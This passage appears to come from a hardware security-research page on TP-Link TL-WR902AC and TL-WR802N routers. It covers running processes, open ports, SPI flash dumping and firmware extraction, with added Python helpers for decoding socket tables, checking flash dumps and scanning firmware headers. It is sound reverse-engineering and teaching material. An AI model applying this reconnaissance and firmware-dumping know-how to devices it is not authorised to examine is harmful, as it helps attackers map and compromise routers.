 1000 admin     1244 S    wlNetlinkTool
 1001 admin     1244 S    wlNetlinkTool
 1003 admin     1080 S    wscd -i ra0 -m 1 -w /var/tmp/wsc_upnp/
 1042 admin        0 SW   [RtmpCmdQTask]
 1043 admin        0 SW   [RtmpWscTask]
 1058 admin     1080 S    wscd_5G -i rai0 -m 1 -w /var/tmp/wsc_upnp_5G/
 1062 admin     2840 S    httpd
 1065 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1077 admin     2260 S    dnsProxy
 1080 admin     1068 S    dhcpd /var/tmp/dconf/udhcpd.conf
 1097 admin     1156 S    dhcp6s -c /var/tmp/dconf/dhcp6s_br0.conf -P /var/run
 1100 admin     2880 S    tmpd
 1104 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1105 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1106 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1107 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1108 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1109 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1110 admin     1764 S    upnpd -L br0 -W eth0.2 -en 1 -P eth0.2 -nat 0 -port
 1111 admin     2740 S    tdpd
 1115 admin      992 R    dhcpc
 1124 admin     1036 S    zebra -d -f /var/tmp/dconf/zebra.conf
 1138 admin     2264 S    diagTool
 1187 admin     2464 S    ushare
 1193 admin     2464 S    ushare
 1195 admin     2464 S    ushare
 1196 admin     2464 S    ushare
 1197 admin     2464 S    ushare
 1198 admin     2464 S    ushare
 1199 admin     2464 S    ushare
 1202 admin     2464 S    ushare
 1215 admin      904 S    vsftpd
 1219 admin     3908 S    smbd -D
 1226 admin     3908 S    smbd -D
 1264 admin     2788 S    tddp
 1285 admin     1136 S    dropbear -p 22 -r /var/tmp/dropbear/dropbear_rsa_hos
 1292 admin     1060 R    ps

Interface Configuration

eth0      Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FC
eth0.3    Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FC
eth0.4    Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FC
eth0.5    Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FC
eth0.6    Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FC
ra0       Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FC
br0       Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FC
  LAN       inet addr:192.168.1.1  Bcast:192.168.1.255  Mask:255.255.255.0

eth0.2    Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FD
  WAN       inet addr:192.168.0.101  Bcast:192.168.0.255  Mask:255.255.255.0

lo        Link encap:Local Loopback
            inet addr:127.0.0.1  Mask:255.0.0.0

rai0      Link encap:Ethernet  HWaddr 98:DA:C4:6E:00:FB

Wireless Interface Configuration

lo        no wireless extensions.
ifb0      no wireless extensions.
ifb1      no wireless extensions.
sit0      no wireless extensions.
ip6tnl0   no wireless extensions.
eth0      no wireless extensions.
br0       no wireless extensions.
eth0.3    no wireless extensions.
eth0.4    no wireless extensions.
eth0.5    no wireless extensions.
eth0.6    no wireless extensions.
eth0.2    no wireless extensions.

ra0       RTWIFI SoftAP  ESSID:"TP-Link_00FC"
          Mode:Managed  Channel=3  Access Point: 98:DA:C4:6E:00:FC
          Bit Rate=300 Mb/s

ra1       RTWIFI SoftAP  ESSID:"TP-Link_Guest_00FC"
          Mode:Managed  Channel=3  Access Point: 9A:DA:C4:7E:00:FC
          Bit Rate=300 Mb/s

apcli0    RTWIFI SoftAP  ESSID:""
          Mode:Managed  Channel=3  Access Point: Not-Associated
          Bit Rate:300 Mb/s

rai0      RTWIFI SoftAP  ESSID:"TP-Link_00FC_5G"
          Mode:Managed  Channel=36  Access Point: 98:DA:C4:6E:00:FB
          Bit Rate=433.5 Mb/s

rai1      RTWIFI SoftAP  ESSID:"TP-Link_Guest_00FC_5G"
          Mode:Managed  Channel=36  Access Point: 9A:DA:C4:6C:00:FB
          Bit Rate=433.5 Mb/s

apclii0   RTWIFI SoftAP  ESSID:""
          Mode:Managed  Channel=36  Access Point: Not-Associated
          Bit Rate:150 Mb/s

Open Ports

cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:4E22 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 604 1 830ec040 300 0 0 2 -1
   1: 0101A8C0:008B 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1057 1 830ed580 300 0 0 2 -1
   2: 00000000:076C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 618 1 830ec480 300 0 0 2 -1
   3: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 548 1 830ed9c0 300 0 0 2 -1
   4: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1029 1 830ecd00 300 0 0 2 -1
   5: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1090 1 80c279e0 300 0 0 2 -1
   6: 00000000:9FFB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 994 1 830ec8c0 300 0 0 2 -1
   7: 0101A8C0:01BD 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1056 1 830ed140 300 0 0 2 -1
   8: 0101A8C0:0050 6401A8C0:D633 06 00000000:00000000 03:000001C8 00000000     0        0 0 3 832f6840<

# Resolved (addresses are printed in host byte order, hence reversed; st 0A = LISTEN, 06 = TIME_WAIT)
  sl  local_address        rem_address           state
   0: 127.0.0.1:20002                            LISTEN
   1: 192.168.1.1:139                            LISTEN
   2: 0.0.0.0:1900                               LISTEN
   3: 0.0.0.0:80                                 LISTEN
   4: 0.0.0.0:21                                 LISTEN
   5: 0.0.0.0:22                                 LISTEN
   6: 0.0.0.0:40955                              LISTEN
   7: 192.168.1.1:445                            LISTEN
   8: 192.168.1.1:80        192.168.1.100:54835  TIME_WAIT (client connection to the web interface)
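
Decoding /proc/net/tcp by hand is error-prone (port and address fields are hexadecimal, and the address is printed in host byte order), so here is an added Python decoder, not part of the original page, run over the listing above. It assumes the listing came from a little-endian host, which the router's own output confirms (192.168.1.1 appears as 0101A8C0).

```python
import socket
import struct

# Constructed sample: the router's /proc/net/tcp listing copied from the output above.
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:4E22 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 604 1 830ec040 300 0 0 2 -1
   1: 0101A8C0:008B 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1057 1 830ed580 300 0 0 2 -1
   2: 00000000:076C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 618 1 830ec480 300 0 0 2 -1
   3: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 548 1 830ed9c0 300 0 0 2 -1
   4: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1029 1 830ecd00 300 0 0 2 -1
   5: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1090 1 80c279e0 300 0 0 2 -1
   6: 00000000:9FFB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 994 1 830ec8c0 300 0 0 2 -1
   7: 0101A8C0:01BD 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1056 1 830ed140 300 0 0 2 -1
   8: 0101A8C0:0050 6401A8C0:D633 06 00000000:00000000 03:000001C8 00000000     0        0 0 3 832f6840
"""

# Socket state codes as printed in the "st" column (include/net/tcp_states.h).
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}


def decode_endpoint(field, little_endian=True):
    """'0101A8C0:0050' -> ('192.168.1.1', 80).

    The kernel prints the 32-bit address as it sits in memory (%08X), so on a
    little-endian host the octets come out reversed; the port is plain big-endian hex."""
    addr_hex, port_hex = field.split(":")
    packed = struct.pack("<I" if little_endian else ">I", int(addr_hex, 16))
    return socket.inet_ntoa(packed), int(port_hex, 16)


def parse_proc_net_tcp(text, little_endian=True):
    """Return one dict per socket line; the header line is skipped."""
    entries = []
    for line in text.splitlines():
        f = line.split()
        if not f or f[0] == "sl":
            continue
        entries.append({
            "local": decode_endpoint(f[1], little_endian),
            "remote": decode_endpoint(f[2], little_endian),
            "state": TCP_STATES.get(f[3], f[3]),
            "uid": int(f[7]),
            "inode": int(f[9]),
        })
    return entries


def listening_sockets(entries):
    """(address, port) of every socket in LISTEN state, in listing order."""
    return [e["local"] for e in entries if e["state"] == "LISTEN"]


def wildcard_listeners(entries):
    """Ports bound to 0.0.0.0: they answer on every interface, the WAN side included,
    and are only protected by the INPUT chain of the firewall."""
    return [port for addr, port in listening_sockets(entries) if addr == "0.0.0.0"]


if __name__ == "__main__":
    for e in parse_proc_net_tcp(PROC_NET_TCP):
        print(f"{e['local'][0]}:{e['local'][1]:<6} {e['remote'][0]}:{e['remote'][1]:<6} {e['state']}")
    print("wildcard listeners:", wildcard_listeners(parse_proc_net_tcp(PROC_NET_TCP)))
```

Only the uid and inode columns are kept beyond the endpoints; on this device every socket belongs to uid 0, which is consistent with the process list, and the inode can be matched against /proc/<pid>/fd to name the owning process when netstat -p is not available.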

Exploit Memory Chips

In-Circuit

SPI Flash

Both examined devices use SPI NOR flash in an SOP8 package to store data and/or (parts of) the firmware. The TL-WR902AC additionally uses a NAND flash chip, which requires chip-off extraction (note that the boot log above only shows the SPI flash being accessed: NVM is FLASH mode, spiflash_ioctl_read). SPI (Serial Peripheral Interface) is a synchronous serial bus (unlike the asynchronous UART) with a master/slave architecture. It is mainly used for communication between components on a board and is a simple and efficient alternative to parallel buses, which makes it well suited to embedded designs; here it is used to talk to the flash chip directly. With packages whose leads are exposed (e.g., SOP8/16) the entire contents of the chip can be read in-circuit, i.e. without desoldering it; this applies to SPI NOR flash chips and I2C EEPROMs in Small-Outline Packages. The SOP8 chips in this case could be read out using an SOP8 test clip and a CH341H programmer. In-circuit reading only works when the programmer can drive the bus alone: if the SoC also powers up and holds the SPI lines, the read fails or returns corrupted data, so a dump should be taken twice and the two copies compared before analysis.
Note: TL-WR902AC: [2.pdf 25Q64CSIG]. TL-WR802N: Winbond 25Q64JVS10. Not processed yet.
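A check worth running on every in-circuit dump before analysing it, as an added example (not code from the original page): it assumes the chip was read twice with the CH341 programmer (the flashrom command in the comment is the usual invocation, not something the page shows) and that the three-byte JEDEC ID reported by the programmer was noted. Two reads that differ, a dump whose size does not match the capacity encoded in the JEDEC ID, or a dump that is almost uniformly 0xFF or 0x00 are the typical symptoms of bad clip contact or of the SoC waking up and driving the bus. The sample dumps in the test are constructed.

```python
"""Sanity-check an in-circuit SPI NOR dump before spending time on it.

Added example, not code from the original page. Assumed workflow (not shown on
the page): read the chip twice with the CH341 programmer, e.g.
    flashrom -p ch341a_spi -r read1.bin
    flashrom -p ch341a_spi -r read2.bin
and note the 3-byte JEDEC ID (command 0x9F) that flashrom prints while probing.
"""
import hashlib


def jedec_capacity(jedec_id):
    """Capacity in bytes from the JEDEC ID (manufacturer, memory type, capacity).

    For the common 25-series parts the third byte is log2 of the capacity:
    0x17 -> 2**23 = 8 MiB, i.e. a "64" (Mbit) part such as the 25Q64 chips
    on both routers. 0xEF is Winbond's manufacturer byte."""
    if len(jedec_id) != 3:
        raise ValueError("expected manufacturer, memory-type and capacity bytes")
    return 1 << jedec_id[2]


def check_dump(read1, read2, jedec_id):
    """Compare two reads with each other and with the chip's nominal size."""
    problems = []
    if read1 != read2:
        n = min(len(read1), len(read2))
        first = next((i for i in range(n) if read1[i] != read2[i]), n)
        problems.append(f"reads differ, first at 0x{first:X} (clip contact or SoC driving the bus)")
    expected = jedec_capacity(jedec_id)
    if len(read1) != expected:
        problems.append(f"dump is {len(read1)} bytes, JEDEC ID says {expected}")
    size = max(len(read1), 1)
    erased = read1.count(0xFF) / size
    zero = read1.count(0x00) / size
    if erased > 0.98 or zero > 0.98:
        problems.append("dump is almost uniformly 0xFF or 0x00 (chip not responding or unpowered)")
    return {
        "sha256": hashlib.sha256(read1).hexdigest(),
        "size": len(read1),
        "erased_fraction": round(erased, 3),
        "problems": problems,
        "ok": not problems,
    }


def sample_dump(size):
    """Constructed stand-in for a real dump: deterministic pseudo-random content."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(size // 32))


if __name__ == "__main__":
    dump = sample_dump(1 << 20)
    print(check_dump(dump, dump, b"\xef\x40\x14"))  # constructed ID: 0x14 -> 1 MiB
```

Keep the sha256 of the verified dump with the device notes; it is what later chip-off or firmware-update comparisons are checked against.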

Firmware

Download

Current Version

Note: CC is the region code of the firmware build (US, EU, DE, AT, JP); VX denotes hardware version X.
Warning: Need to review links and complete the list.

TL-WR902AC

CC  Hardware Version
US  V1, V3
EU  V1, V3
JP  V1, V3

TL-WR802N

CC  Hardware Version
US  V1, V2, V4
DE  V1, V2, V3, V4
AT  V1, V2
JP  V1, V2, V3, V4

Known Versions

TL-WR902AC

CC  HW  Firmware Version
EU  V1  170628, 160905
US  V1  160905
EU  V3  191018, 170828, 170717
US  V3  191209, 171229, 170826

Third-Party-Firmware

The original firmware of some TP-Link products can be replaced with third-party firmware such as DD-WRT. TP-Link is not obliged to provide support or warranty for such modified devices, is not responsible for their stability or performance, and will not compensate for damage caused by third-party firmware.

Extraction

$ ./firmware-mod-kit/extract-firmware.sh ./Firmware/V3/TL-WR902AC(EU)_V3_191018/TL-WR902ACv3_EU_0.9.1_0.3_up_boot[191018-rel34369].bin
Firmware Mod Kit (extract) 0.99, (c)2011-2013 Craig Heffner, Jeremy Collake

Scanning firmware...

Scan Time:     2020-06-20 03:58:35
Target File:   ./Firmware/V3/TL-WR902AC(EU)_V3_191018/TL-WR902ACv3_EU_0.9.1_0.3_up_boot[191018-rel34369].bin
MD5 Checksum:  4e87ca6fb7717bb509e843fbac2d060e
Signatures:    344

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
82384         0x141D0         U-Boot version string, "U-Boot 1.1.3 (Oct 18 2019 - 09:12:58)"
132096        0x20400         LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 3634292 bytes
1442304       0x160200        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 6375860 bytes, 759 inodes, blocksize: 131072 bytes, created: 2019-10-18 01:32:50

Extracting 1442304 bytes of  header image at offset 0
Extracting squashfs file system at offset 1442304
Extracting squashfs files...
Firmware extraction successful!
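The scan above works by looking for known headers at every offset. The following scanner is an added example, not code from the original page and not firmware-mod-kit's own code; it recognises the three signatures in the output above (the U-Boot version banner, an LZMA-alone header with properties byte, dictionary size and uncompressed size, and a SquashFS 4 superblock, the latter for little-endian "hsqs" as well as big-endian "sqsh" targets) and carves the filesystem for unsquashfs. The image it runs on is constructed in the code (offsets and sizes are made up; the superblock field values mirror the real scan) so that it runs offline.

```python
"""Find and describe the pieces of a raw firmware image by their headers,
the way the firmware-mod-kit/binwalk scan above does.

Added example, not code from the original page nor from firmware-mod-kit.
build_sample_image() constructs a stand-in image: offsets and sizes are
made up, the SquashFS field values mirror the real scan output.
"""
import re
import struct
from datetime import datetime, timezone

SQUASHFS_COMPRESSORS = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}
UBOOT_RE = re.compile(rb"U-Boot \d+\.\d+(?:\.\d+)? \([^)\n]{0,40}\)")


def parse_squashfs_superblock(image, off):
    """Describe the SquashFS superblock at image[off:], or None if there is none."""
    endian = {b"hsqs": "<", b"sqsh": ">"}.get(image[off:off + 4])
    if endian is None or off + 48 > len(image):
        return None
    (inodes, mkfs_time, block_size, _fragments, compression, block_log, _flags,
     _no_ids, major, minor, _root_inode, bytes_used) = struct.unpack_from(
        endian + "IIIIHHHHHHQQ", image, off + 4)
    # A random "hsqs" inside data almost never passes these consistency checks
    if major != 4 or block_size != 1 << block_log or not 0 < bytes_used <= len(image) - off:
        return None
    return {
        "type": "squashfs", "offset": off, "version": f"{major}.{minor}",
        "endian": "little" if endian == "<" else "big",
        "compression": SQUASHFS_COMPRESSORS.get(compression, f"unknown({compression})"),
        "bytes_used": bytes_used, "inodes": inodes, "block_size": block_size,
        "created": datetime.fromtimestamp(mkfs_time, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
    }


def parse_lzma_header(image, off):
    """LZMA-alone header: properties byte (lc/lp/pb), u32 dictionary size,
    u64 uncompressed size. Only the default properties byte 0x5D is accepted
    and both sizes must be plausible, otherwise random bytes match constantly."""
    if off + 13 > len(image) or image[off] != 0x5D:
        return None
    dict_size, unc_size = struct.unpack_from("<IQ", image, off + 1)
    if dict_size & (dict_size - 1) or not 4096 <= dict_size <= 64 << 20:
        return None
    if not 0 < unc_size <= 256 << 20:
        return None
    return {"type": "lzma", "offset": off, "dict_size": dict_size, "uncompressed_size": unc_size}


def scan_image(image):
    """All recognised headers, sorted by offset (like the DECIMAL/HEXADECIMAL table)."""
    found = [{"type": "u-boot", "offset": m.start(), "banner": m.group().decode()}
             for m in UBOOT_RE.finditer(image)]
    for magic, parser in ((b"\x5d", parse_lzma_header),
                          (b"hsqs", parse_squashfs_superblock),
                          (b"sqsh", parse_squashfs_superblock)):
        pos = image.find(magic)
        while pos != -1:
            hit = parser(image, pos)
            if hit:
                found.append(hit)
            pos = image.find(magic, pos + 1)
    return sorted(found, key=lambda h: h["offset"])


def carve_squashfs(image, sb):
    """Slice the filesystem out (from the magic, bytes_used long) for unsquashfs;
    on flash it is padded up to the erase-block size, which unsquashfs ignores."""
    return image[sb["offset"]:sb["offset"] + sb["bytes_used"]]


def build_sample_image():
    """Constructed stand-in for a firmware file: zeros with three headers."""
    img = bytearray(0x8000)
    banner = b"U-Boot 1.1.3 (Oct 18 2019 - 09:12:58)"
    img[0x200:0x200 + len(banner)] = banner
    lz = b"\x5d" + struct.pack("<IQ", 8 << 20, 3634292)
    img[0x400:0x400 + len(lz)] = lz
    # inodes, mkfs_time, block_size, fragments, compression(4=xz), block_log,
    # flags, no_ids, major, minor, root_inode, bytes_used
    sb = b"hsqs" + struct.pack("<IIIIHHHHHHQQ", 759, 1571362370, 131072, 12, 4, 17,
                               0xC0, 1, 4, 0, 0x20, 0x3000)
    img[0x1000:0x1000 + len(sb)] = sb
    return bytes(img)


if __name__ == "__main__":
    for hit in scan_image(build_sample_image()):
        print(hit)
```

Run against the real .bin the same loop reports the U-Boot banner, the LZMA kernel and the xz-compressed SquashFS at the offsets binwalk printed; carve_squashfs() followed by unsquashfs on the result is the manual equivalent of the "Extracting squashfs file system" step.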

GPL Code

TL-WR902AC

CC  Hardware Version
US  V1, V3
EU

Developer notes

Had a bad day? Try some developer notes, quoted verbatim from the GPL source. Thank you!
/* Find it out, where you are? ^_^, update config first */

/* Bug ^_^ be careful */

/* Do not care about the others now */
default:
	DEBUG("we don't care it,^_^!");
	break;
}

/* 
 * brief: just rebuild all ,so what about big big disk? just pray ^_^
 *		  maybe use sqlite... in the future.
 */

/* Do it again and again are you tired ^_^? */

/* For passing test, and let the customer be happy, we ... ^_^, it is not so bad */

References

TP-Link

Description Link
TP-Link https://www.tp-link.com/at/ (accessed 20 June 2020)
https://www.tp-link.com/us/ (accessed 20 June 2020)
Awards https://www.tp-link.com/at/press/award/ (accessed 20 June 2020)

TP-Link TL-WR902AC: AC750 Wifi - Travel Router

Description Link
Product https://www.tp-link.com/at/home-networking/wifi-router/tl-wr902ac/ (accessed 20 June 2020)
https://www.tp-link.com/us/home-networking/wifi-router/tl-wr902ac/ (accessed 19 June 2020)
Support https://www.tp-link.com/at/support/download/tl-wr902ac/ (accessed 20 June 2020)
https://www.tp-link.com/us/support/download/tl-wr902ac/ (accessed 20 June 2020)
Datasheet https://static.tp-link.com/TL-WR902AC.pdf (accessed 19 June 2020)

TP-Link TL-WR802N: 300Mbps Wireless N - Nano Router

Description Link
Product https://www.tp-link.com/at/home-networking/wifi-router/tl-wr802n/ (accessed 24 June 2020)
https://www.tp-link.com/us/home-networking/wifi-router/tl-wr802n/ (accessed 24 June 2020)
Support https://www.tp-link.com/at/support/download/tl-wr802n/ (accessed 24 June 2020)
https://www.tp-link.com/us/support/download/tl-wr802n/ (accessed 24 June 2020)
Datasheet https://static.tp-link.com/2018/201810/20181022/TL-WR802N(EU&US)%204.0-datasheet.pdf (accessed 24 June 2020)

Other

Description Link
Dropbear Configuration https://openwrt.org/docs/guide-user/base-system/dropbear (accessed 28 June 2020)

Vulnerability Reports

Description Link
TL-WR840N (1) https://www.cvedetails.com/cve/CVE-2019-15060/
Busybox 1.19.2 (5) https://www.cvedetails.com (accessed 1 July 2020)
Linux 2.6.36 (233) https://www.cvedetails.com (accessed 1 July 2020)
TP-Link (123) https://www.cvedetails.com (accessed 1 July 2020)

Used Hardware